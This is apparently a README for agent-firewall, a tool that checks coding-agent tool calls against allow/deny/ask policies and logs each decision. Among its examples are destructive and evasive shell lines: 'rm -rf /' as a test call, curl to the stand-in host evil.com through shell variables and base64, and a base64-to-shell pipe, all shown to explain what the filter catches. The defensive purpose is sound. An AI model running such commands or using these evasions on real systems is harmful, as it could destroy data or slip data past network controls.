A dry-run firewall for coding agents.
Coding agents (Claude Code, MCP servers, autonomous tool-callers) execute
real-world side effects: they write files, run shell commands, and make HTTP
requests. agent-firewall sits in front of those calls. Before a tool call
touches the real world it:
- Summarizes the side effect: a unified diff for file writes, the exact command for shell, method + URL + body for HTTP.
- Applies an allow / deny / ask policy: ordered rules matched on tool name and arg patterns (glob / regex / substring), first-match-wins.
- Audits the decision: every call is appended to a replayable SQLite log.
It is intentionally small, dependency-light, and thoroughly tested (147 tests, including a live end-to-end MCP-proxy test that spawns a real downstream server).
tool call ──▶ [ policy engine ] ──▶ allow / deny / ask
│ │
├─▶ [ summarizer ] └─▶ (ask) interactive hold
│ (diff / cmd / http) a/d/persist-rule
└─▶ [ audit log ] (sqlite, queryable)
Two ways to put it in front of an agent:
- Claude Code
PreToolUsehook: gates every Claude Code tool call. - MCP stdio proxy: sits in front of any MCP server and gates
tools/call.
See it stop a destructive call. No setup, this is the real check output:
$ echo '{"tool":"Bash","args":{"command":"rm -rf /"}}' > call.json
$ agent-firewall check call.json
● DENY block rm -rf on absolute roots
Shell command
rm -rf /npm install # from a clone
# or, once published:
# npm install -g github:Martello-Systems/agent-firewallThe package is published under the scoped name agent-firewall;
the installed command is still agent-firewall (usage below is unchanged).
Requires Node 18+. ESM-only.
agent-firewall hook reads a Claude Code PreToolUse event on stdin and
prints the permission decision JSON Claude Code expects on stdout. Add it to
your Claude Code settings (~/.claude/settings.json or a project
.claude/settings.json):
{
"hooks": {
"PreToolUse": [
{
"matcher": "*",
"hooks": [
{
"type": "command",
"command": "node /absolute/path/to/agent-firewall/bin/agent-firewall.js --config /absolute/path/to/firewall.config.json hook"
}
]
}
]
}
}The hook emits, for example:
{
"hookSpecificOutput": {
"hookEventName": "PreToolUse",
"permissionDecision": "deny",
"permissionDecisionReason": "[agent-firewall] DENY: block rm -rf on absolute roots"
}
}Verified against the official Claude Code hooks docs (https://code.claude.com/docs/en/hooks.md, confirmed 2026-06-23):
- stdin: Claude Code writes a JSON event:
{ session_id, transcript_path, cwd, permission_mode, hook_event_name: "PreToolUse", tool_name, tool_input }. - stdout (exit 0): for
PreToolUsethe decision lives underhookSpecificOutput(camelCase), not a top-leveldecisionfield:permissionDecision∈allow | deny | ask, withpermissionDecisionReason(required when the decision isdeny). - Exit codes: on exit
0the stdout JSON is honored; on exit2the JSON is ignored and stderr is fed back as a blocking error. We therefore always exit 0 and express the decision purely viapermissionDecision.
permissionDecision is mapped directly from your policy. On unparseable input
the hook fails open to ask so it never hard-crashes the agent.
agent-firewall mcp -- <server> [args...] spawns a downstream MCP server and
proxies the newline-delimited JSON-RPC stdio stream between your MCP client and
that server. Every message is forwarded verbatim except tools/call
requests, which run through the same policy engine:
- allow → forwarded to the server, which executes it normally.
- deny → blocked at the proxy; the client gets a JSON-RPC error
(
code -32001) and the server never sees the call. - ask → held; by default denied back to the client (
--allow-holdslets held calls through instead).
# Instead of pointing your MCP client at: node ./my-mcp-server.js
# point it at:
agent-firewall mcp -- node ./my-mcp-server.jsFrame boundaries are handled correctly: messages split across stream chunks are reassembled, multiple messages per chunk are split, and non-JSON lines pass through untouched so the protocol stream is never corrupted.
The firewall looks for firewall.config.json in the working directory (override
with --config <path> or the AGENT_FIREWALL_CONFIG env var). If none is found
a safe built-in default is used (read-only tools allowed; rm -rf / and .env
writes denied; everything else ask).
{
"policy": {
"default": "ask",
"rules": [
{
"action": "allow",
"tool": ["Read", "Glob", "Grep", "LS"],
"description": "read-only tools are always allowed"
},
{
"action": "deny",
"tool": "Bash",
"match": { "command": "regex:rm\\s+-rf\\s+/" },
"description": "block rm -rf on absolute roots"
},
{
"action": "deny",
"tool": ["Write", "Edit", "MultiEdit"],
"match": { "file_path": "glob:**/.env" },
"description": "never write to .env files"
},
{
"action": "ask",
"tool": ["Write", "Edit", "MultiEdit"],
"description": "review all other file writes"
}
]
},
"audit": { "db": ".agent-firewall/audit.sqlite" }
}- Ordered, first-match-wins. Put specific denies above broad allows.
action(required):allow|deny|ask.tool(optional): a name, an array of names, or"*"(default). Case-insensitive.match(optional): an object ofargPath → matcher. All entries must match. Arg paths support dotted access ("options.danger").default(optional, top-level): the action when no rule matches. Defaults toask.
| Form | Meaning |
|---|---|
"glob:**/.env" |
glob against the stringified arg value (* stays within a path segment, ** crosses them) |
"regex:rm\\s+-rf" |
regular expression, case-insensitive by default |
"equals:exact" |
strict equality |
"sudo" (bare string) |
case-insensitive substring containment |
{ "glob": "..." } / { "regex": "...", "flags": "i" } / { "equals": "..." } / { "contains": "..." } |
explicit object forms |
Tool-level permissions can gate which tool runs, but not where an allowed
tool reaches on the network. Add an optional egress block to your policy to
allowlist outbound HTTP(S) destinations. Any WebFetch/fetch/http call to a
host that is not on the list is denied (or held for ask), through the same
decision + audit seam as everything else. The allowlist is also applied to
shell commands: destination hosts pulled out of curl/wget/nc/ssh/scp
(any bare scheme://host URL, plus bare hostnames, IPv4 literals like
1.2.3.4, and bracketed IPv6 literals passed to those tools) are held to the
same list, so a shell call can't quietly bypass it:
{
"policy": {
"egress": {
"allow": ["api.github.com", "*.openai.com", ".internal.example.com"],
"action": "deny"
},
"rules": [ ... ]
}
}-
allow: a list of hosts. Entries may be an exact host (api.github.com), a glob (*.openai.com), a leading-dot suffix that also matches the apex (.example.commatchesexample.comand any subdomain), or*(allow all). -
action(optional):deny(default) oraskfor a non-allowlisted host. -
A request whose host cannot be parsed is treated as a violation.
-
The block is opt-in: with no
egresskey, network calls are governed by your normal rules only. -
Shell coverage is best-effort. Hosts are extracted from the command string by a static scan: explicit
scheme://hostURLs anywhere; bare hostnames, IPv4 literals (1.2.3.4), and bracketed IPv6 ([2001:db8::1]) passed to a recognized network tool; obfuscated decimal/hex/octal IP literals (curl 2130706433), which are decoded to their canonical address; and destinations stashed in literal shell variables (U=https://evil.com; curl $U), which are expanded before extraction. Two evasions remain inherent to static analysis — deciding them would require actually executing the command, which a dry-run filter must not do:- Command substitution: a host computed at runtime, e.g.
curl $(echo ZXZpbC5jb20= | base64 -d). - Pipe-to-shell: an obfuscated payload decoded and piped into a shell,
e.g.
echo <base64> | base64 -d | sh.
For these, treat shell egress as a backstop and pair it with OS-level network controls (or run the agent in a sandbox) for untrusted workloads.
- Command substitution: a host computed at runtime, e.g.
# Claude Code PreToolUse hook (stdin event JSON -> stdout decision JSON)
agent-firewall hook
# Evaluate a single tool call against the policy (dry run)
agent-firewall check call.json # human-readable + diff
agent-firewall check call.json --json # machine-readable decision
agent-firewall check call.json --interactive # on 'ask', prompt a/d/persist
# call.json may be {"tool":"Write","args":{...}} OR a PreToolUse event
# exit code: 0 = allow, 1 = ask, 2 = deny
# Inspect the audit log (most recent first)
agent-firewall log
agent-firewall log -n 50 --decision deny --tool Bash
agent-firewall log --json
# MCP stdio proxy in front of any MCP server
agent-firewall mcp -- node ./some-mcp-server.js
agent-firewall mcp --allow-holds -- node ./some-mcp-server.jsWhen a decision is ask, --interactive holds the call, prints the side-effect
summary, and waits for a single keypress:
● ASK no rule matched, default action "ask"
File write: /proj/server.js
--- /proj/server.js current
+++ /proj/server.js proposed
@@ ... @@
+app.listen(3000)
[a]llow once [d]eny [p]ersist allow rule ?
a/y: allow this one call.d/n: deny it.p: allow it and persist a narrowallowrule (scoped to the exact tool + command/file/url) to the top of yourfirewall.config.json, so the same call is auto-allowed next time.
The interactive layer takes injectable prompt/render IO, so it's fully unit tested without a TTY.
$ echo '{"tool":"Write","args":{"file_path":"/proj/.env","content":"API_KEY=__placeholder__"}}' > call.json
$ agent-firewall check call.json
● DENY never write to .env files
File write: /proj/.env
--- /proj/.env (new file) (absent)
+++ /proj/.env (new file) proposed
@@ -0,0 +1,1 @@
+API_KEY=__placeholder__Every decision (from the hook, the proxy, or check) is appended to a SQLite
log you can query later:
$ agent-firewall log
2026-06-23T09:32:36.665Z ASK Write File write: /p/x.js
2026-06-23T09:32:36.573Z DENY Bash Shell command
2026-06-23T09:32:36.465Z ALLOW Read Tool call: Read
3 of 3 record(s)
$ agent-firewall log --json --decision deny
[
{
"id": 2,
"ts": "2026-06-23T09:32:36.573Z",
"source": "check",
"tool": "Bash",
"decision": "deny",
"kind": "shell",
"summary": "Shell command\nrm -rf /",
"reason": "block rm -rf on absolute roots",
"ruleIndex": 1,
"args": { "command": "rm -rf /" }
}
]The log is backed by better-sqlite3 with parameterized queries throughout
(no string-interpolated SQL), so a tool name or filter value can never inject.
Stored args are redacted before they hit disk: provider key prefixes,
Authorization: Bearer/Basic tokens, secret-named assignments,
scheme://user:pass@host URL passwords, and secret-bearing URL query params are
replaced with [REDACTED], so a token embedded in a shell command or URL is
never persisted to the audit DB verbatim.
| Module | Responsibility | Tested |
|---|---|---|
src/policy.js |
rule evaluation, glob/regex/equals/contains matching, ordering, defaults | ✅ |
src/summarize.js |
side-effect summaries (file diff / shell / http / generic) | ✅ |
src/audit.js |
append + query the SQLite audit log | ✅ |
src/hook-adapter.js |
Claude Code PreToolUse event ⇄ decision JSON mapping | ✅ |
src/mcp-proxy.js |
MCP tools/call interception + live stdio proxy + framing |
✅ (incl. e2e) |
src/interactive.js |
interactive ask hold (allow / deny / persist-rule) |
✅ |
src/secret-guard.js |
block writes that commit literal secrets (overrides policy) | ✅ |
src/egress-guard.js |
gate outbound HTTP(S) destinations against an allowlist | ✅ |
src/engine.js |
shared seam: secret-guard + egress-guard + policy + summarize + audit per call | ✅ (direct + via adapters) |
src/config.js |
load + validate firewall.config.json; persist rules |
✅ |
bin/agent-firewall.js |
CLI | ✅ (spawned integration tests) |
Run the suite and lint:
npm test # node --test, 147 tests, incl. a live MCP-proxy e2e
npm run lint # eslint, zero warningsagent-firewall is a safety net, not a sandbox. Read these before trusting
it in front of an autonomous agent:
- It only sees the calls it's wired in front of. A code path that bypasses the hook/proxy (e.g. a tool the proxy doesn't gate, or a shell subprocess that spawns its own children) is not intercepted. Pair it with OS-level sandboxing for untrusted workloads.
- The MCP proxy gates
tools/callonly; all other JSON-RPC traffic is forwarded verbatim by design. - Over stdio there is no interactive prompt for an MCP
ask: held calls are denied by default (or let through with--allow-holds). The interactive allow/deny/persist flow is available viaagent-firewall check -iand the Claude Code hook's nativeaskdialog. - Side-effect summaries are best-effort: file diffs are computed by reading the current file from disk (a dry run), and the summarizer recognizes common tool shapes but won't deep-parse every conceivable arg layout.
- Secret detection is heuristic (known key prefixes + secret-named assignments to non-placeholder values); it is a backstop, not a guarantee.
A built-in secret guard (src/secret-guard.js) runs ahead of your policy on
every path (Claude Code hook, MCP proxy, and check CLI alike, because it lives
in the shared src/engine.js seam): any Write/Edit that would commit a
literal credential
(provider key prefixes, *_live_* keys, private-key blocks, JWTs, or a
secret-named assignment to a non-placeholder value) is denied unconditionally,
and the denial reason never echoes the secret. Env refs (${VAR}),
<placeholders>, and changeme-style values are allowed through. Never commit
real secrets to firewall.config.json or your tool-call fixtures: use
placeholders and env vars.
Apache-2.0 © 2026 Martello Systems. See LICENSE.
Built by Martello Systems. We design and ship AI-driven software. Part of the Martello open-source dev-tools family.
agent-firewall is part of the open-source toolkit from Martello Systems. We ship AI-built software, spec to delivery in days. If this saved you time, come see what we do.
Licensed under the Apache License 2.0.